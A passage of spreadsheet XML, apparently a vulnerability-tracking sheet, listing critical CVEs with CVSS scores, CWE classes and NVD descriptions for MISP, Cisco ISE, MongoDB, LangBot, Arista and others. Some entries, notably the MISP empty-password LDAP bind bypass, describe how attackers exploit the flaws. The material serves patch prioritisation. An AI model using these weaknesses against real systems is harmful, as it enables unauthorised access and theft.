          <t>The LdapAuth and LinOTPAuth authentication plugins in MISP contain an authentication bypass vulnerability. Both LdapAuthenticate and LinOTPAuthenticate replace CakePHP's FormAuthenticate class but fail to replicate its _checkFields() input validation guard. As a result, the email and password fields extracted from the login request are passed to downstream authentication logic without verifying that they are non-empty strings.
In the LDAP authenticator, an empty or null password is forwarded to ldap_bind(). Per RFC 4513 section 5.1.2, a bind request with a valid DN and an empty password constitutes an unauthenticated bind, which many LDAP directory servers accept as successful. An attacker who knows any valid user email address in the directory can therefore authenticate as that user without possessing a password. Additionally, non-string values (null, false, arrays) are either coerced to empty strings by ldap_bind(), raise TypeErrors, or are misinterpreted as find conditions in _findUser(), all of which can lead to unintended authentication outcomes.
In the LinOTP authenticator, the same missing guard allows non-string credentials to be concatenated into the LinOTP verification request, and in the mixed-authentication branch an empty password is accepted against a stored hash of the empty string.
A secondary issue in the LDAP authenticator is that newly created user accounts (auto-provisioned on first LDAP login) were assigned an empty password. Because the save path skips validation, the empty string is hashed and stored. If the user later ceases to be found in LDAP and the mixed-authentication fallback is used, the stored hash of the empty string verifies against an empty password, again permitting unauthenticated access.
The vulnerability requires that the affected plugin (LdapAuth or LinOTPAuth) is enabled on the MISP instance and that the attacker knows at least one valid email address registered in the directory or MISP user store. No prior authentication is required. Successful exploitation grants the attacker the full privileges of the impersonated user, which may include administrative access to threat intelligence data.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90961</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91104</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91104</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91106</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91106</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73456</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>Under certain circumstances on affected platforms running Arista EOS with gRPC Network Packet Sampling Interface (gNPSI) enabled, an unauthenticated gNPSI client can craft a malicious request to allow arbitrary code execution, granting an attacker full administrative control over the compromised switch.</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73456</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90562</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>LangBot before 4.10.11 generates password recovery keys with only 24 bits of entropy and applies no rate limiting to the unauthenticated reset-password endpoint. Remote attackers knowing the administrator email can exhaust the keyspace through concurrent requests to reset the admin password and gain account access.</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90562</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15638</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>1443cd92-d354-46d2-9290-d812316ca43a</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated user with access to Secret Server could leverage a padding oracle to decrypt or encrypt data using one of the server's cryptographic keys. The key itself is not exposed.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15638</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20176</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid high-privileged administrative credentials.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain system-level access to the underlying operating system and then elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20176</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20194</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20194 are related to incorrect resource transfer between spheres that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-669.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20194</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20211</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid high-privileged administrative credentials.
This vulnerability is due to insecure deserialization of Java objects by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to&amp;nbsp;root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20211</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20237</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20237 are related to improper input validation issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-20.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20237</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20284</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the SXP REST API of Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks.
This vulnerability is due to insufficient validation of user-supplied input in REST API calls. An attacker could exploit this vulnerability by sending crafted input to an affected device. A successful exploit could allow the attacker to view or modify data on the underlying database for the affected device. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.
To exploit this vulnerability, the attacker must have valid administrative credentials, have the SXP service enabled, and have at least one SXP connection configured.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20284</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20305</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the diagnostic tools of Cisco ISE and ISE-PIC could allow an authenticated, remote attacker to perform command injection attacks on the underlying operating system and elevate privileges to&amp;nbsp;root. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20305</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20306</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and ISE-PIC could allow an authenticated, remote attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20306</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20341</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software could allow an authenticated, remote attacker to obtain&amp;nbsp;root privileges.
This vulnerability is due to unsecured deserialization of untrusted data over the sftunnel management connection. An attacker could exploit this vulnerability by sending crafted sftunnel remote procedure calls (RPCs). A successful exploit could allow the attacker to gain root privileges on a device that is running Cisco Secure FMC Software and its high-availability peer.
To exploit this vulnerability, the attacker must have valid administrative credentials on a managed Cisco FTD device.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20341</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43790</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43790</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
